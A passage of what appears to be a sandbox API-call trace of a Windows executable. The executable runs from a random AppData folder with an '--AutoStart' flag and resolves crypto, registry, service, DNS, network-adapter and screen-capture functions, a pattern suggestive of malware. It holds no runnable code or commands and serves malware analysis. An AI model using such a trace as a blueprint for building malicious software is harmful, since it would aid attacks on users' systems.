lpProcName="GetConsoleMode") returned 0x74eb1328 [0212.652] GetProcAddress (hModule=0x74ea0000, lpProcName="HeapSize") returned 0x772c3002 [0212.652] GetProcAddress (hModule=0x74ea0000, lpProcName="LoadLibraryExW") returned 0x74eb495d [0212.652] GetProcAddress (hModule=0x74ea0000, lpProcName="OutputDebugStringW") returned 0x74edd1d4 [0212.652] GetProcAddress (hModule=0x74ea0000, lpProcName="SetConsoleCtrlHandler") returned 0x74eb8a09 [0212.652] GetProcAddress (hModule=0x74ea0000, lpProcName="RtlUnwind") returned 0x74edd1c3 [0212.652] GetProcAddress (hModule=0x74ea0000, lpProcName="FatalAppExitA") returned 0x74f34691 [0212.652] GetProcAddress (hModule=0x74ea0000, lpProcName="GetStartupInfoW") returned 0x74eb4d40 [0212.653] GetProcAddress (hModule=0x74ea0000, lpProcName="GetExitCodeProcess") returned 0x74ec174d [0212.653] GetProcAddress (hModule=0x74ea0000, lpProcName="LCMapStringW") returned 0x74eb17b9 [0212.653] GetProcAddress (hModule=0x74ea0000, lpProcName="DeleteCriticalSection") returned 0x772c45f5 [0212.653] GetProcAddress (hModule=0x74ea0000, lpProcName="AreFileApisANSI") returned 0x74f340d1 [0212.653] GetProcAddress (hModule=0x74ea0000, lpProcName="ExitProcess") returned 0x74eb7a10 [0212.653] GetProcAddress (hModule=0x74ea0000, lpProcName="GetProcessHeap") returned 0x74eb14e9 [0212.653] GetProcAddress (hModule=0x74ea0000, lpProcName="HeapReAlloc") returned 0x772d1f6e [0212.653] GetProcAddress (hModule=0x74ea0000, lpProcName="GlobalFree") returned 0x74eb5558 [0212.653] GetProcAddress (hModule=0x74ea0000, lpProcName="SetEndOfFile") returned 0x74ecce2e [0212.653] GetProcAddress (hModule=0x74ea0000, lpProcName="ReadConsoleInputA") returned 0x74f56f53 [0212.653] GetProcAddress (hModule=0x74ea0000, lpProcName="CloseHandle") returned 0x74eb1410 [0212.653] GetProcAddress (hModule=0x74ea0000, lpProcName="HeapFree") returned 0x74eb14c9 [0212.654] GetProcAddress (hModule=0x74ea0000, lpProcName="HeapAlloc") returned 0x772be026 [0212.654] GetProcAddress (hModule=0x74ea0000, lpProcName="EnterCriticalSection") returned 0x772b22b0 [0212.654] GetProcAddress (hModule=0x74ea0000, lpProcName="LeaveCriticalSection") returned 0x772b2270 [0212.654] GetProcAddress (hModule=0x74ea0000, lpProcName="GetStdHandle") returned 0x74eb51b3 [0212.654] GetProcAddress (hModule=0x74ea0000, lpProcName="GetFileType") returned 0x74eb3531 [0212.654] GetProcAddress (hModule=0x74ea0000, lpProcName="GetModuleHandleExW") returned 0x74eb4a6f [0212.654] GetProcAddress (hModule=0x74ea0000, lpProcName="WriteConsoleW") returned 0x74ed7aca [0212.654] GetProcAddress (hModule=0x74ea0000, lpProcName="EncodePointer") returned 0x772d0fcb [0212.654] GetProcAddress (hModule=0x74ea0000, lpProcName="DecodePointer") returned 0x772c9d35 [0212.654] GetProcAddress (hModule=0x74ea0000, lpProcName="GetSystemTimeAsFileTime") returned 0x74eb3509 [0212.654] GetProcAddress (hModule=0x74ea0000, lpProcName="IsDebuggerPresent") returned 0x74eb4a5d [0212.654] GetProcAddress (hModule=0x74ea0000, lpProcName="IsProcessorFeaturePresent") returned 0x74eb5235 [0212.654] GetProcAddress (hModule=0x74ea0000, lpProcName="IsValidCodePage") returned 0x74eb4493 [0212.655] GetProcAddress (hModule=0x74ea0000, lpProcName="GetACP") returned 0x74eb179c [0212.655] GetProcAddress (hModule=0x74ea0000, lpProcName="GetOEMCP") returned 0x74edd1a1 [0212.655] GetProcAddress (hModule=0x74ea0000, lpProcName="GetCPInfo") returned 0x74eb5189 [0212.655] GetProcAddress (hModule=0x74ea0000, lpProcName="GetCurrentThread") returned 0x74eb17ec [0212.655] GetProcAddress (hModule=0x74ea0000, lpProcName="GetCurrentThreadId") returned 0x74eb1450 [0212.655] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76430000 [0212.655] GetProcAddress (hModule=0x76430000, lpProcName="PeekMessageW") returned 0x764505ba [0212.655] GetProcAddress (hModule=0x76430000, lpProcName="PostThreadMessageW") returned 0x76448bff [0212.655] GetProcAddress (hModule=0x76430000, lpProcName="DefWindowProcW") returned 0x772c25dd [0212.655] GetProcAddress (hModule=0x76430000, lpProcName="DispatchMessageW") returned 0x7644787b [0212.655] GetProcAddress (hModule=0x76430000, lpProcName="UpdateWindow") returned 0x76453559 [0212.655] GetProcAddress (hModule=0x76430000, lpProcName="CreateWindowExW") returned 0x76448a29 [0212.656] GetProcAddress (hModule=0x76430000, lpProcName="LoadCursorW") returned 0x764488f7 [0212.656] GetProcAddress (hModule=0x76430000, lpProcName="IsWindow") returned 0x76447136 [0212.656] GetProcAddress (hModule=0x76430000, lpProcName="ShowWindow") returned 0x76450dfb [0212.656] GetProcAddress (hModule=0x76430000, lpProcName="RegisterClassExW") returned 0x7644b17d [0212.656] GetProcAddress (hModule=0x76430000, lpProcName="PostQuitMessage") returned 0x76449abb [0212.656] GetProcAddress (hModule=0x76430000, lpProcName="GetMessageW") returned 0x764478e2 [0212.656] GetProcAddress (hModule=0x76430000, lpProcName="DestroyWindow") returned 0x76449a55 [0212.656] GetProcAddress (hModule=0x76430000, lpProcName="SendMessageW") returned 0x76449679 [0212.656] GetProcAddress (hModule=0x76430000, lpProcName="GetProcessWindowStation") returned 0x76449eea [0212.656] GetProcAddress (hModule=0x76430000, lpProcName="GetUserObjectInformationW") returned 0x76448068 [0212.656] GetProcAddress (hModule=0x76430000, lpProcName="MessageBoxA") returned 0x7649fd1e [0212.656] GetProcAddress (hModule=0x76430000, lpProcName="GetDesktopWindow") returned 0x76450a19 [0212.657] GetProcAddress (hModule=0x76430000, lpProcName="MessageBoxW") returned 0x7649fd3f [0212.657] GetProcAddress (hModule=0x76430000, lpProcName="TranslateMessage") returned 0x76447809 [0212.657] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76780000 [0212.657] GetProcAddress (hModule=0x76780000, lpProcName="RegCloseKey") returned 0x7679469d [0212.657] GetProcAddress (hModule=0x76780000, lpProcName="CloseServiceHandle") returned 0x7679369c [0212.657] GetProcAddress (hModule=0x76780000, lpProcName="GetUserNameW") returned 0x7679157a [0212.657] GetProcAddress (hModule=0x76780000, lpProcName="ReportEventA") returned 0x76783ee9 [0212.657] GetProcAddress (hModule=0x76780000, lpProcName="RegisterEventSourceA") returned 0x76792d46 [0212.657] GetProcAddress (hModule=0x76780000, lpProcName="DeregisterEventSource") returned 0x767935dd [0212.657] GetProcAddress (hModule=0x76780000, lpProcName="CryptHashData") returned 0x7678df36 [0212.657] GetProcAddress (hModule=0x76780000, lpProcName="RegSetValueExW") returned 0x767914d6 [0212.657] GetProcAddress (hModule=0x76780000, lpProcName="CryptDestroyHash") returned 0x7678df66 [0212.658] GetProcAddress (hModule=0x76780000, lpProcName="ControlService") returned 0x767a7144 [0212.658] GetProcAddress (hModule=0x76780000, lpProcName="RegOpenKeyExW") returned 0x7679468d [0212.658] GetProcAddress (hModule=0x76780000, lpProcName="CryptCreateHash") returned 0x7678df4e [0212.658] GetProcAddress (hModule=0x76780000, lpProcName="CryptEncrypt") returned 0x767a779b [0212.658] GetProcAddress (hModule=0x76780000, lpProcName="CryptImportKey") returned 0x7678c532 [0212.658] GetProcAddress (hModule=0x76780000, lpProcName="QueryServiceStatus") returned 0x76792a86 [0212.658] GetProcAddress (hModule=0x76780000, lpProcName="RegQueryValueExW") returned 0x767946ad [0212.658] GetProcAddress (hModule=0x76780000, lpProcName="CryptReleaseContext") returned 0x7678e124 [0212.658] GetProcAddress (hModule=0x76780000, lpProcName="OpenServiceW") returned 0x7678ca4c [0212.658] GetProcAddress (hModule=0x76780000, lpProcName="OpenSCManagerW") returned 0x7678ca64 [0212.658] GetProcAddress (hModule=0x76780000, lpProcName="CryptAcquireContextW") returned 0x7678df14 [0212.658] GetProcAddress (hModule=0x76780000, lpProcName="CryptGetHashParam") returned 0x7678df7e [0212.659] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75000000 [0212.662] GetProcAddress (hModule=0x75000000, lpProcName="SHGetPathFromIDListW") returned 0x750917bf [0212.663] GetProcAddress (hModule=0x75000000, lpProcName="SHGetSpecialFolderLocation") returned 0x7508e141 [0212.663] GetProcAddress (hModule=0x75000000, lpProcName="ShellExecuteA") returned 0x75247078 [0212.663] GetProcAddress (hModule=0x75000000, lpProcName="ShellExecuteExW") returned 0x75021e46 [0212.663] GetProcAddress (hModule=0x75000000, lpProcName="CommandLineToArgvW") returned 0x75019ee8 [0212.663] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathA") returned 0x75117804 [0212.663] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x762d0000 [0212.663] GetProcAddress (hModule=0x762d0000, lpProcName="CoInitialize") returned 0x762eb636 [0212.663] GetProcAddress (hModule=0x762d0000, lpProcName="CoInitializeSecurity") returned 0x762f7259 [0212.663] GetProcAddress (hModule=0x762d0000, lpProcName="CoUninitialize") returned 0x763186d3 [0212.664] GetProcAddress (hModule=0x762d0000, lpProcName="CoCreateInstance") returned 0x76319d0b [0212.664] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76180000 [0212.664] GetProcAddress (hModule=0x76180000, lpProcName=0x6) returned 0x76183e59 [0212.664] GetProcAddress (hModule=0x76180000, lpProcName=0x8) returned 0x76183ed5 [0212.664] GetProcAddress (hModule=0x76180000, lpProcName=0x9) returned 0x76183eae [0212.664] GetProcAddress (hModule=0x76180000, lpProcName=0xc8) returned 0x76183f21 [0212.664] GetProcAddress (hModule=0x76180000, lpProcName=0xca) returned 0x7618fd6b [0212.664] GetProcAddress (hModule=0x76180000, lpProcName=0xc9) returned 0x76184af8 [0212.664] GetProcAddress (hModule=0x76180000, lpProcName=0xc) returned 0x76185dee [0212.664] GetProcAddress (hModule=0x76180000, lpProcName=0x2) returned 0x76184642 [0212.664] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x74c20000 [0214.747] GetProcAddress (hModule=0x74c20000, lpProcName="GetAdaptersInfo") returned 0x74c29263 [0214.747] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x765c0000 [0214.778] GetProcAddress (hModule=0x765c0000, lpProcName=0xc) returned 0x765cb131 [0214.778] GetProcAddress (hModule=0x765c0000, lpProcName=0xb) returned 0x765c311b [0214.778] GetProcAddress (hModule=0x765c0000, lpProcName=0x34) returned 0x765d7673 [0214.778] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74bc0000 [0214.801] GetProcAddress (hModule=0x74bc0000, lpProcName="DnsFree") returned 0x74bc436b [0214.802] GetProcAddress (hModule=0x74bc0000, lpProcName="DnsQuery_W") returned 0x74bd572c [0214.802] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x769b0000 [0214.802] GetProcAddress (hModule=0x769b0000, lpProcName="CryptStringToBinaryA") returned 0x769e5d77 [0214.802] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76e00000 [0214.802] GetProcAddress (hModule=0x76e00000, lpProcName="DeleteObject") returned 0x76e15689 [0214.802] GetProcAddress (hModule=0x76e00000, lpProcName="GetObjectA") returned 0x76e185d4 [0214.802] GetProcAddress (hModule=0x76e00000, lpProcName="SelectObject") returned 0x76e14f70 [0214.802] GetProcAddress (hModule=0x76e00000, lpProcName="GetDeviceCaps") returned 0x76e14de0 [0214.803] GetProcAddress (hModule=0x76e00000, lpProcName="GetBitmapBits") returned 0x76e1c155 [0214.803] GetProcAddress (hModule=0x76e00000, lpProcName="BitBlt") returned 0x76e15ea6 [0214.803] GetProcAddress (hModule=0x76e00000, lpProcName="DeleteDC") returned 0x76e158b3 [0214.803] GetProcAddress (hModule=0x76e00000, lpProcName="CreateDCA") returned 0x76e17bcc [0214.803] GetProcAddress (hModule=0x76e00000, lpProcName="CreateCompatibleDC") returned 0x76e154f4 [0214.803] GetProcAddress (hModule=0x76e00000, lpProcName="CreateCompatibleBitmap") returned 0x76e15f49 [0214.803] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x74b00000 [0215.101] GetProcAddress (hModule=0x74b00000, lpProcName="atexit") returned 0x74b1c544 [0215.101] atexit (param_1=0x1e50920) returned 0 [0215.108] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18e7cc | out: lpSystemTimeAsFileTime=0x18e7cc*(dwLowDateTime=0x74cd3060, dwHighDateTime=0x1d5fd35)) [0215.108] GetCurrentThreadId () returned 0x560 [0215.108] GetCurrentProcessId () returned 0x55c [0215.108] QueryPerformanceCounter (in: lpPerformanceCount=0x18e7c4 | out: lpPerformanceCount=0x18e7c4*=9368532048) returned 1 [0215.278] GetStartupInfoW (in: lpStartupInfo=0x18e75c | out: lpStartupInfo=0x18e75c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x74eb3519, hStdOutput=0x772afd35, hStdError=0x77317daf)) [0215.390] GetProcessHeap () returned 0x630000 [0215.636] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74ea0000 [0215.637] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsAlloc") returned 0x74eb4f2b [0215.639] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsFree") returned 0x74eb359f [0215.640] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsGetValue") returned 0x74eb1252 [0215.641] GetProcAddress (hModule=0x74ea0000, lpProcName="FlsSetValue") returned 0x74eb4208 [0215.641] GetProcAddress (hModule=0x74ea0000, lpProcName="InitializeCriticalSectionEx") returned 0x74eb4d28 [0215.644] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateEventExW") returned 0x74f3410b [0215.645] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateSemaphoreExW") returned 0x74f34195 [0215.645] GetProcAddress (hModule=0x74ea0000, lpProcName="SetThreadStackGuarantee") returned 0x74ebd31f [0215.646] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateThreadpoolTimer") returned 0x74ecee7e [0215.647] GetProcAddress (hModule=0x74ea0000, lpProcName="SetThreadpoolTimer") returned 0x772d441c [0215.647] GetProcAddress (hModule=0x74ea0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x772fc50e [0215.647] GetProcAddress (hModule=0x74ea0000, lpProcName="CloseThreadpoolTimer") returned 0x772fc381 [0215.650] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateThreadpoolWait") returned 0x74ecf088 [0215.650] GetProcAddress (hModule=0x74ea0000, lpProcName="SetThreadpoolWait") returned 0x772e05d7 [0215.652] GetProcAddress (hModule=0x74ea0000, lpProcName="CloseThreadpoolWait") returned 0x772fca24 [0215.652] GetProcAddress (hModule=0x74ea0000, lpProcName="FlushProcessWriteBuffers") returned 0x772b0b8c [0215.652] GetProcAddress (hModule=0x74ea0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7736fde8 [0215.653] GetProcAddress (hModule=0x74ea0000, lpProcName="GetCurrentProcessorNumber") returned 0x77301e1d [0215.653] GetProcAddress (hModule=0x74ea0000, lpProcName="GetLogicalProcessorInformation") returned 0x74f34761 [0215.653] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateSymbolicLinkW") returned 0x74f2cd11 [0215.654] GetProcAddress (hModule=0x74ea0000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0215.654] GetProcAddress (hModule=0x74ea0000, lpProcName="EnumSystemLocalesEx") returned 0x74f3424f [0215.660] GetProcAddress (hModule=0x74ea0000, lpProcName="CompareStringEx") returned 0x74f346b1 [0215.660] GetProcAddress (hModule=0x74ea0000, lpProcName="GetDateFormatEx") returned 0x74f46676 [0215.703] GetProcAddress (hModule=0x74ea0000, lpProcName="GetLocaleInfoEx") returned 0x74f34751 [0215.703] GetProcAddress (hModule=0x74ea0000, lpProcName="GetTimeFormatEx") returned 0x74f465f1 [0215.703] GetProcAddress (hModule=0x74ea0000, lpProcName="GetUserDefaultLocaleName") returned 0x74f347c1 [0215.703] GetProcAddress (hModule=0x74ea0000, lpProcName="IsValidLocaleName") returned 0x74f347e1 [0215.703] GetProcAddress (hModule=0x74ea0000, lpProcName="LCMapStringEx") returned 0x74f347f1 [0215.703] GetProcAddress (hModule=0x74ea0000, lpProcName="GetCurrentPackageId") returned 0x0 [0215.703] GetProcAddress (hModule=0x74ea0000, lpProcName="GetTickCount64") returned 0x74eceee0 [0215.703] GetProcAddress (hModule=0x74ea0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0215.703] GetProcAddress (hModule=0x74ea0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0215.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3bc) returned 0x64f540 [0215.704] GetCurrentThreadId () returned 0x560 [0215.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x6423c8 [0215.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x800) returned 0x64f908 [0215.711] GetStartupInfoW (in: lpStartupInfo=0x18e72c | out: lpStartupInfo=0x18e72c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x5b70b97f, hStdError=0x58)) [0215.711] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0215.711] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0215.711] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0215.711] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart" [0215.711] GetEnvironmentStringsW () returned 0x650110* [0215.711] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb02) returned 0x650c20 [0215.786] FreeEnvironmentStringsW (penv=0x650110) returned 1 [0215.793] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmjek7fnkhtt.exe")) returned 0x65 [0215.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xf0) returned 0x651730 [0215.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x9c) returned 0x651828 [0215.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3e) returned 0x645938 [0215.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x6c) returned 0x6518d0 [0215.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x6e) returned 0x651948 [0215.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x78) returned 0x642f48 [0215.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x62) returned 0x6519c0 [0215.793] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2e) returned 0x64b260 [0215.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x48) returned 0x646de0 [0215.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x28) returned 0x64ac20 [0215.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1a) returned 0x64f2f8 [0215.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x4a) returned 0x651a30 [0215.794] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x72) returned 0x642fc8 [0215.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x30) returned 0x64b298 [0215.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2e) returned 0x64b2d0 [0215.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1c) returned 0x64f320 [0215.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xd2) returned 0x651a88 [0215.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x7c) returned 0x651b68 [0215.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x36) returned 0x651bf0 [0215.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3a) returned 0x645980 [0215.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x90) returned 0x651c30 [0215.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x24) returned 0x64ac50 [0215.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x30) returned 0x64b308 [0215.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x36) returned 0x651cc8 [0215.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x48) returned 0x646e30 [0215.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x52) returned 0x651d08 [0215.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3c) returned 0x6459c8 [0215.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x82) returned 0x651d68 [0215.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2e) returned 0x64b340 [0215.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x28) returned 0x64ac80 [0215.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1e) returned 0x64f348 [0215.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2c) returned 0x64b378 [0215.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x54) returned 0x651df8 [0215.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x52) returned 0x651e58 [0215.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2a) returned 0x64b3b0 [0215.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3c) returned 0x645a10 [0215.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x54) returned 0x651eb8 [0215.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x24) returned 0x64acb0 [0215.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x30) returned 0x64b3e8 [0215.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x8c) returned 0x651f18 [0215.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x650c20 | out: hHeap=0x630000) returned 1 [0216.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x800) returned 0x650110 [0216.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x80) returned 0x650918 [0216.277] GetLastError () returned 0x0 [0216.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x220) returned 0x6509a0 [0216.277] GetLastError () returned 0x0 [0216.278] IsValidCodePage (CodePage=0x4e4) returned 1 [0216.278] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e720 | out: lpCPInfo=0x18e720) returned 1 [0216.287] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e1e8 | out: lpCPInfo=0x18e1e8) returned 1 [0216.300] GetLastError () returned 0x0 [0216.309] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0216.309] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x18dd28, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0216.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18e4fc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f 